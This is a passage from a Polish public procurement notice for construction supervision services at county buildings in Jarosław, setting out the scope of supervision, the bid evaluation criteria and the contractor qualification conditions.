niewłaściwym wykonawstwem;<br/>13)	rozliczenia końcowego robót budowlanych, o których mowa w § 1 niniejszej umowy przy udziale Wykonawcy robót budowlanych;<br/>14)	prowadzenie przez Inspektora nadzoru inwestorskiego branży konstrukcyjno-budowlanej bieżącej dokumentacji fotograficznej z realizacji robót, w szczególności z odbiorów wszelkich prac ulegających zakryciu oraz całości inwestycji w odstępach miesięcznych ( w razie potrzeby częściej). Zdjęcia będą opisane i opatrzone datą. Przekazanie dokumentacji fotograficznej będzie odbywać się do 10 dnia miesiąca, następującego po miesiącu, za który Wykonawca zobowiązany jest przekazać Zamawiającemu powyższą dokumentację w formie elektronicznej (link do fotografii, płyta CD, DVD) lub papierowej.<br/>8.	Wykonawca zobowiązany będzie wykonać przedmiot zamówienia zgodnie z obowiązującymi przepisami prawa, postanowieniami SWZ, zapisami własnej oferty oraz warunki szczegółowo określonymi postanowieniami Projektu umowy, stanowiącego Załącznik Nr 7.1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">720 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">:<br/>1.	Kryteria oceny ofert:<br/>1)	cena oferty (brutto) – C waga kryterium 60%;<br/>2)	doświadczenie osób wyznaczonych do realizacji zamówienia – D waga kryterium 40%.<br/>2.	Zamawiający oceni oferty oddzielnie dla każdej z 2 Części zamówienia wg zasady 1% = 1 punkt.<br/>3.	Podstawą przyznania punktów w kryterium „cena oferty (brutto) – C” będzie cena oferty brutto podana przez Wykonawcę w Formularzu ofertowym.<br/>4.	W kryterium „cena oferty (brutto) – C” oferta z najniższą ceną otrzyma maksymalną liczbę 60 punktów, a pozostałe oferty otrzymają odpowiednią liczbę punktów wyliczoną z dokładnością do dwóch miejsc po przecinku wg wzoru:<br/>[(najniższa cena C w zbiorze ofert podlegających ocenie : cena C ocenianej oferty) x 60 = ilość pkt.]<br/>5.	W kryterium „doświadczenie osób wyznaczonych do realizacji zamówienia – D” oferta może otrzymać maksymalnie 40 punktów. Każda oferta otrzyma liczbę punktów odpowiednią do doświadczenia osób wyznaczonych do realizacji zamówienia wykazanego przez Wykonawcę w złożonym w terminie składania ofert wraz z ofertą „Wykazie kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej”, wyliczoną z dokładnością do dwóch miejsc po przecinku wg wzoru.<br/>[(ocena punktowa w kryterium D ocenianej oferty : najwyższa ocena punktowa w kryterium D w zbiorze ofert podlegających ocenie) x 40 = ilość pkt.]<br/>6.	Ocena punktowa, o której mowa w powyższym wzorze (ust. 5) stanowić będzie sumę punktów przyznanych ofercie na podstawie informacji zawartych w złożonym przez Wykonawcę „Wykazie kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej”, gdzie za każde / każdorazowe wykazanie, że wskazana w wykazie osoba uczestniczyła w realizacji zamówienia oraz zgodnie z posiadanymi uprawnieniami zawodowymi w pracach polegających na:<br/>1)	nadzorowaniu robót budowlanych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane obejmujących budowę, przebudowę, rozbudowę, nadbudowę, remont obiektu użyteczności publicznej o wartości umownej nadzorowanych robót nie mniejszej niż 2 000 000,00 zł.: 1 punkt;<br/>2)	kierowaniu robotami budowlanymi w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane obejmujących budowę, przebudowę, rozbudowę, nadbudowę, remont obiektu użyteczności publicznej o wartości umownej nadzorowanych robót nie mniejszej niż 2 000 000,00 zł.: 1 punkt.<br/>7.	Jeżeli Wykonawca nie złożony w terminie składania ofert wraz z ofertą „Wykazu kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej” lub jeżeli Wykonawca nie przedstawi w złożonym Wykazie, o którym mowa powyżej, wszystkich wymaganych przez Zamawiającego informacji pozwalających na przyznanie ofercie punktów w kryterium oceny ofert: „doświadczenie osób wyznaczonych do realizacji zamówienia – D” w sposób opisany powyżej w ust. 5 i ust. 6, oferta otrzyma 0 pkt w tym kryterium oceny ofert, tj. w kryterium: doświadczenie osób wyznaczonych do realizacji zamówienia – D.<br/>8.	W przypadku gdy w trybie art. 274 ust. 1 ustawy Pzp Zamawiający wezwie Wykonawcę do złożenia, uzupełnienia, poprawienia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 273 ust. 1 ustawy Pzp lub wymaganych pełnomocnictw albo innych dokumentów niezbędnych do przeprowadzenia postępowania, nie będzie to dotyczyło „Wykazu kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej”, składanego w celu poddania złożonej oferty ocenie.<br/>9.	Za ofertę najkorzystniejszą dla Zamawiającego w ramach danej Części zamówienia zostanie uznana oferta, która otrzyma największą liczbę punktów ogółem – R, tj. suma punktów uzyskanych przez ofertę w poszczególnych kryteriach oceny ofert: (R = C + D).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są usługi polegające na pełnieniu obowiązków inspektora nadzoru budowlanego w ramach nadzoru inwestorskiego w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2024 r. poz. 725 z późn. zm.) nad robotami budowlanymi wykonywanymi w zakresie obiektów kubaturowych Powiatu Jarosławskiego, zlokalizowanych na terenie miasta Jarosławia.<br/>2.	Przedmiot niniejszego zamówienia został podzielony na 2 Części.<br/>3.	Części nr 2 zamówienia pod nazwą: ,,Nadzór inwestorski nad realizacją robót budowlanych obejmujących: „Rozbudowę i przebudowę budynku dydaktycznego Zespołu Szkół Technicznych i Ogólnokształcących w Jarosławiu w ramach zadania inwestycyjnego pod nazwą Utworzenie Branżowego Centrum Umiejętności” swoim zakresem obejmuje nadzór nad robotami budowlanymi, w skład których wchodzą:<br/>1)	roboty architektoniczne i konstrukcyjno-budowlane obejmujące rozbudowę i przebudowę budynku dydaktycznego ZSTiO w Jarosławiu wraz ze stałym wyposażeniem, obejmujące:<br/>a) rozbudowę istniejącego budynku warsztatowo-dydaktycznego o nową część dydaktyczną<br/>budynku oraz rozbudowę o łącznik nadziemny (połączenie z istniejącym budynkiem głównym),<br/>b) rozbudowę istniejącego budynku warsztatowo-dydaktycznego o nową klatkę schodową,<br/>c) przebudowę istniejącego budynku warsztatowo-dydaktycznego, zlokalizowanego przy <br/>ul. Świętego Ducha 1A;<br/>2) roboty instalacyjne w zakresie instalacji i urządzeń oraz sieci i przyłączy obejmujące:<br/>a) budowę wewnętrznych i zewnętrznych instalacji zapewniających użytkowanie budynku<br/>zgodnie z przeznaczeniem, tj. w szczególności:<br/>− wodociągową wody zimnej, ciepłej i cyrkulacyjnej;<br/>− kanalizacji sanitarnej,<br/>− kanalizacji deszczowej,<br/>− wentylacji mechanicznej,<br/>− gazową,<br/>− centralnego ogrzewania i ciepłej wody użytkowej,<br/>− klimatyzacji,<br/>− fotowoltaiczną,<br/>− oświetlenia podstawowego i ewakuacyjnego,<br/>− gniazd wtykowych,<br/>− połączeń wyrównawczych,<br/>− ochrony od porażeń,<br/>− przepięciową,<br/>− odgromową,<br/>− hydrantową,<br/>− systemu kontroli dostępu,<br/>− teletechniczną i nadzoru wizyjnego,<br/>b) budowę i przebudowę infrastruktury technicznej:<br/>− przebudowę fragmentu sieci i przyłącza kanalizacji sanitarnej, kanalizacji deszczowej<br/>oraz wodociągowej, a także energetycznej w tym również przebudowę oświetlenia<br/>zewnętrznego oraz przebudowę kolidującego fragmentu wewnętrznej sieci<br/>elektrycznej, jak również przebudowę fragmentu kanalizacji deszczowej,<br/>− przebudowę sieci gazowej,<br/>− budowę przyłącza gazowego,<br/>− budowę przyłącza wodociągowego,<br/>− budowę przyłącza kanalizacyjnego;<br/>3) zagospodarowanie terenu wokół przebudowanego i rozbudowanego obiektu, budowę układu komunikacyjnego zgodnie z projektem zagospodarowania terenu (powierzchni utwardzonych, zjazdu), elementów małej architektury wraz z budową bramy wjazdowej <br/>i ogrodzeniem, stworzenie fragmentów zieleni i niskiego zadrzewienia, wraz z ogrodzeniem, oświetleniem i przystosowaniem do potrzeb osób niepełnosprawnych.<br/>4.	Pełnienie nadzoru obejmować będzie następujące branże:<br/>1) konstrukcyjno-budowlaną,<br/>2)	sanitarną tj. instalacyjną w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, <br/>3)	elektryczną tj. instalacyjną w zakresie sieci, instalacji i urządzeń elektrycznych <br/>i elektroenergetycznych.<br/>5.	Świadczenie usług Wykonawca zapewni przy pomocy zespołu Inspektorów nadzoru inwestorskiego w wyżej wymienionych branżach, przy czym inspektor nadzoru inwestorskiego branży konstrukcyjno-budowlanej będzie pełnił funkcję Koordynatora zespołu.<br/>6.	Szczegółowy opis przedmiotu zamówienia tj. zakresu robót budowlanych podlegających nadzorowi w ramach Część nr 2 zamówienia określa ,,Opis przedmiotu zamówienia”, stanowiąca Załącznik Nr 1.2 do SWZ.<br/>7.	Do obowiązków Wykonawcy / Inspektor nadzoru inwestorskiego w ramach pełnionego nadzoru będą należeć w szczególności: <br/>1)	reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli nad zgodnością realizacji robót z dokumentacją projektowo – techniczną, umową zawartą z Wykonawcą robót, przepisami BHP, obowiązującymi normami technicznymi oraz zasadami wiedzy technicznej i sztuki budowlanej;<br/>2)	liczba pobytów Inspektorów nadzoru w miejscu prowadzenia prac musi zapewnić prawidłowy i skuteczny nadzór nad przebiegiem robót i wynikać będzie z bieżących potrzeb. Inspektor nadzoru inwestorskiego branży konstrukcyjno-budowlanej zobowiązuje się do wizyt na budowie minimum 2 razy w tygodniu wraz z udokumentowaniem wizyty niezbędnym wpisem w dzienniku budowy;<br/>3)	sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów, a w szczególności zapobieganie stosowania wyrobów wadliwych i niedopuszczonych do obrotu i stosowania <br/>w budownictwie;<br/>4)	sprawdzenie i odbiór w imieniu Zamawiającego wszystkich robót budowlanych, w tym ulegających zakryciu lub zanikowi, uczestniczenie w próbach technicznych instalacji, urządzeń technicznych i przewodów oraz dokonywanie odbioru gotowych elementów budowli i przekazanie ich do użytkowania;<br/>5)	uczestniczenie w komisjach, spotkaniach i naradach budowy dotyczących realizacji przedmiotowej inwestycji;<br/>6)	sprawdzenie i potwierdzenie faktycznie wykonanych robót, usunięcie wad oraz kontrolowanie rozliczeń budowy, zatwierdzania do zapłaty rachunków i faktur przedłożonych przez Wykonawcę robót budowlanych;<br/>7)	kontrolowanie prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót;<br/>8)	w przypadku rozliczania wykonania robót budowlanych podlegających nadzorowi w ramach niniejszej umowy Inspektorzy nadzoru zobowiązani są w terminie 14 dni od dnia otrzymania od Wykonawcy robót budowlanych podlegających nadzorowi w ramach niniejszej umowy, zestawienia wykonanych robót budowlanych/prac podlegających odbiorowi częściowemu wraz z rozliczeniem ich wartości, sprawdzić zestawienie wartości wykonanych robót budowlanych/prac, rozliczyć ich wartości, dokonać ewentualnych korekt przedłożonego zestawienia, potwierdzić kwoty należnych do zapłaty Wykonawcy, a następnie dokonać odbioru robót budowlanych/prac podlegających odbiorowi częściowemu zgodnie z otrzymanym zestawieniem;<br/>9)	dokonanie w terminie ustalonym w umowie z Wykonawcą robót budowlanych odbioru końcowego robót budowlanych podlegających nadzorowi w ramach niniejszej umowy, z którego sporządzi stosowny protokół i przekaże Zamawiającemu;<br/>10)	skompletowanie i przekazanie Zamawiającemu dokumentów pozwalających na ocenę prawidłowego wykonania przedmiotu odbioru, a w szczególności przekazanie:<br/>a)	dziennika budowy,<br/>b)	dokumentacji powykonawczej,<br/>c)	protokołów technicznych i częściowych odbioru robót budowlanych,<br/>d)	protokołów badań,<br/>e)	gwarancji,<br/>f)	aprobat technicznych,<br/>g)	atestów i certyfikatów jakości,<br/>h)	deklaracji zgodności z PN,<br/>i)	kart materiałowych,<br/>j)	dokumentacji technicznej z naniesionymi zmianami dokonywanymi w toku wykonania przedmiotu umowy, jeżeli miały miejsce,<br/>k)	inwentaryzacji geodezyjnej wykonanej przez uprawnionego geodetę;<br/>11)	przedstawienia wraz z dokumentami, o których mowa w pkt 10 zaświadczenia <br/>o zakończeniu budowy/robót budowlanych, wystawionego przez Inspektorów budowy wszystkich branż wskazujące, że:<br/>a)	prace budowlano-remontowe zostały wykonane zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie;<br/>b)	roboty zostały ukończone zgodnie z obowiązującymi przepisami, w tym pełnej zgodności z „Wytycznymi Technicznymi dotyczącymi stosowania zasady „nie czyń poważnych szkód” na podstawie rozporządzenia ustanawiającego Instrument na rzecz Odbudowy i Zwiększania Odporności 2021/C 58/01”<br/> wymagane na podstawie Umowy o objęcie przedsięwzięcia wsparciem z Planu Rozwojowego.<br/>12)	uczestniczenie w komisjach usterkowych poodbiorowych oraz w przeglądach w okresie rękojmi i gwarancji na prace wykonywane przez wykonawcę robót budowlanych tj. okres 60 miesięcy liczonych od dnia odbioru końcowego przez Zamawiającego robót objętych nadzorem inwestorskim w ramach niniejszej umowy, na zawiadomienie Zamawiającego, potwierdzenia usunięcia wad i usterek w okresie gwarancji i rękojmi, uczestnictwa w odbiorze pogwarancyjnym inwestycji, bez dodatkowego wynagrodzenia;<br/>13)	Inspektor będzie zobowiązany do wykonywania czynności w imieniu Zamawiającego w ramach nadzoru inwestorskiego w okresie gwarancji, w terminach wyznaczonych przez Zamawiającego, a w szczególności w przypadku zgłoszenia usterek spowodowanych niewłaściwym wykonawstwem;<br/>14)	rozliczenia końcowego robót budowlanych, o których mowa w § 1 niniejszej umowy przy udziale Wykonawcy robót budowlanych;<br/>15)	prowadzenie przez Inspektora nadzoru inwestorskiego branży konstrukcyjno-budowlanej bieżącej dokumentacji fotograficznej z realizacji robót, w szczególności z odbiorów wszelkich prac ulegających zakryciu oraz całości inwestycji w odstępach miesięcznych ( w razie potrzeby częściej). Zdjęcia będą opisane i opatrzone datą. Przekazanie dokumentacji fotograficznej będzie odbywać się do 10 dnia miesiąca, następującego po miesiącu, za który Wykonawca zobowiązany jest przekazać Zamawiającemu powyższą dokumentację w formie elektronicznej (link do fotografii, płyta CD, DVD) lub papierowej.<br/>8.	Wykonawca zobowiązany będzie wykonać przedmiot zamówienia zgodnie z obowiązującymi przepisami prawa, postanowieniami SWZ, zapisami własnej oferty oraz warunki szczegółowo określonymi postanowieniami Projektu umowy, stanowiącego Załącznik Nr 7.2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">450 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">:<br/>1.	Kryteria oceny ofert:<br/>1)	cena oferty (brutto) – C waga kryterium 60%;<br/>2)	doświadczenie osób wyznaczonych do realizacji zamówienia – D waga kryterium 40%.<br/>2.	Zamawiający oceni oferty oddzielnie dla każdej z 2 Części zamówienia wg zasady 1% = 1 punkt.<br/>3.	Podstawą przyznania punktów w kryterium „cena oferty (brutto) – C” będzie cena oferty brutto podana przez Wykonawcę w Formularzu ofertowym.<br/>4.	W kryterium „cena oferty (brutto) – C” oferta z najniższą ceną otrzyma maksymalną liczbę 60 punktów, a pozostałe oferty otrzymają odpowiednią liczbę punktów wyliczoną z dokładnością do dwóch miejsc po przecinku wg wzoru:<br/>[(najniższa cena C w zbiorze ofert podlegających ocenie : cena C ocenianej oferty) x 60 = ilość pkt.]<br/>5.	W kryterium „doświadczenie osób wyznaczonych do realizacji zamówienia – D” oferta może otrzymać maksymalnie 40 punktów. Każda oferta otrzyma liczbę punktów odpowiednią do doświadczenia osób wyznaczonych do realizacji zamówienia wykazanego przez Wykonawcę w złożonym w terminie składania ofert wraz z ofertą „Wykazie kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej”, wyliczoną z dokładnością do dwóch miejsc po przecinku wg wzoru.<br/>[(ocena punktowa w kryterium D ocenianej oferty : najwyższa ocena punktowa w kryterium D w zbiorze ofert podlegających ocenie) x 40 = ilość pkt.]<br/>6.	Ocena punktowa, o której mowa w powyższym wzorze (ust. 5) stanowić będzie sumę punktów przyznanych ofercie na podstawie informacji zawartych w złożonym przez Wykonawcę „Wykazie kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej”, gdzie za każde / każdorazowe wykazanie, że wskazana w wykazie osoba uczestniczyła w realizacji zamówienia oraz zgodnie z posiadanymi uprawnieniami zawodowymi w pracach polegających na:<br/>1)	nadzorowaniu robót budowlanych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane obejmujących budowę, przebudowę, rozbudowę, nadbudowę, remont obiektu użyteczności publicznej o wartości umownej nadzorowanych robót nie mniejszej niż 2 000 000,00 zł.: 1 punkt;<br/>2)	kierowaniu robotami budowlanymi w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane obejmujących budowę, przebudowę, rozbudowę, nadbudowę, remont obiektu użyteczności publicznej o wartości umownej nadzorowanych robót nie mniejszej niż 2 000 000,00 zł.: 1 punkt.<br/>7.	Jeżeli Wykonawca nie złożony w terminie składania ofert wraz z ofertą „Wykazu kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej” lub jeżeli Wykonawca nie przedstawi w złożonym Wykazie, o którym mowa powyżej, wszystkich wymaganych przez Zamawiającego informacji pozwalających na przyznanie ofercie punktów w kryterium oceny ofert: „doświadczenie osób wyznaczonych do realizacji zamówienia – D” w sposób opisany powyżej w ust. 5 i ust. 6, oferta otrzyma 0 pkt w tym kryterium oceny ofert, tj. w kryterium: doświadczenie osób wyznaczonych do realizacji zamówienia – D.<br/>8.	W przypadku gdy w trybie art. 274 ust. 1 ustawy Pzp Zamawiający wezwie Wykonawcę do złożenia, uzupełnienia, poprawienia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 273 ust. 1 ustawy Pzp lub wymaganych pełnomocnictw albo innych dokumentów niezbędnych do przeprowadzenia postępowania, nie będzie to dotyczyło „Wykazu kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej”, składanego w celu poddania złożonej oferty ocenie.<br/>9.	Za ofertę najkorzystniejszą dla Zamawiającego w ramach danej Części zamówienia zostanie uznana oferta, która otrzyma największą liczbę punktów ogółem – R, tj. suma punktów uzyskanych przez ofertę w poszczególnych kryteriach oceny ofert: (R = C + D).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu z postępowania na podstawie:<br/>a)	art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego,<br/>b)	art. 108 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych;<br/>2)	spełniają warunki dotyczące zdolności technicznej lub zawodowej.<br/>2.	Zamawiający stwierdzi, że Wykonawca spełnia warunki udziału w postępowaniu w odniesieniu do:<br/>1) w zakresie dotyczącym dysponowania osobami zdolnymi do wykonania zamówienia na odpowiednim poziomie jakości, wykaże, że dysponuje lub będzie dysponował na etapie realizacji zamówienia na etapie realizacji zamówienia następującymi osobami:<br/>a)	co najmniej jedną osobą odpowiedzialną za nadzorowanie robót, inspektorem nadzoru inwestorskiego branży konstrukcyjno-budowlanej, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub uprawnienia równoważne, przynależy do właściwej izby samorządu zawodowego i posiada wymagane ubezpieczenie od odpowiedzialności cywilnej,<br/>b)	co najmniej jedną osobą odpowiedzialną za nadzorowanie robót, inspektorem nadzoru inwestorskiego branży elektrycznej, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej <br/>w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub uprawnienia równoważne, przynależy do właściwej izby samorządu zawodowego i posiada wymagane ubezpieczenie od odpowiedzialności cywilnej,<br/>c)	co najmniej jedną osobą odpowiedzialną za nadzorowanie robót, inspektorem nadzoru inwestorskiego branży sanitarnej, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych <br/>i kanalizacyjnych bez ograniczeń lub uprawnienia równoważne, przynależy do właściwej izby samorządu zawodowego i posiada wymagane ubezpieczenie od odpowiedzialności cywilnej;<br/>2) w zakresie dotyczącym posiadania doświadczenia, jeżeli wykaże, że w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał, co najmniej dwie (2) usługi (2 zamówienia / 2 umowy / 2 kontrakty), z których każda polegała na świadczeniu usług w zakresie nadzoru budowlanego nad robotami budowlanymi obejmującymi budowę, przebudowę, rozbudowę, nadbudowę, remont obiektu użyteczności publicznej o kubaturze co najmniej 2 500 m3 oraz <br/>o wartości umownej nadzorowanych robót nie mniejszej niż 2 000 000,00 zł. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">:<br/>1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu, Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia: <br/>1)	Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za nadzór nad robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, potwierdzającego spełnianie warunku udziału w postępowaniu opisanego w Rozdziale X ust. 3 pkt 1 SWZ – wzór wykazu stanowi Załącznik Nr 8.1 do SWZ dla Części nr 1 lub Załącznik Nr 8.2 do SWZ dla Części nr 2;<br/>2)	Wykazu usług wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, potwierdzającego spełnianie warunku udziału w postępowaniu opisanego w Rozdziale X ust. 3 pkt 2 SWZ – wzór wykazu stanowi Załącznik Nr 9.1 do SWZ dla Części nr 1 lub Załącznik Nr 9.2 do SWZ dla Części nr 2.<br/>2.	Dowodami, o których mowa powyżej w ust. 1 pkt 2, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz ofertowy, podpisany przez Wykonawcę [osobę (osoby) umocowaną prawnie] – wzór stanowi odpowiednio: Załącznik Nr 2.1 do SWZ dla Części nr 1 zamówienia oraz Załącznik Nr 2.2 do SWZ dla Części nr 2 zamówienia;<br/>2.	Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, tj. oświadczenie <br/>o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie określonym przez Zamawiającego, podpisane przez Wykonawcę [osobę (osoby) umocowaną prawnie] – wzór stanowi Załącznik Nr 3 do SWZ;<br/>3.	Wykaz kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej, podpisany przez Wykonawcę [osobę (osoby) umocowaną prawnie]– wzór stanowi Załącznik Nr 2A.1 do SWZ dla Części nr 1 zamówienia oraz załącznik 2A.2 do SWZ dla Części nr 2 zamówienia;<br/>UWAGA: W „Wykaz kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej” (wzór stanowi Załącznik Nr 2A.1 do SWZ dla Części nr 1 zamówienia oraz załącznik 2A.2 do SWZ dla Części nr 2 zamówienia) należy wykazać w kolumnie nr 4 tabeli Wykazu zadania wykonane (zakończone) w okresie ostatnich 5 lat, licząc od dnia składania oferty.<br/>„Wykaz kwalifikacji zawodowych i doświadczenia osoby skierowanej (wyznaczonej) przez Wykonawcę do sprawowania funkcji inspektora nadzoru branży konstrukcyjno-budowlanej” (wzór stanowi Załącznik Nr 2A do SWZ), składany w celu poddania 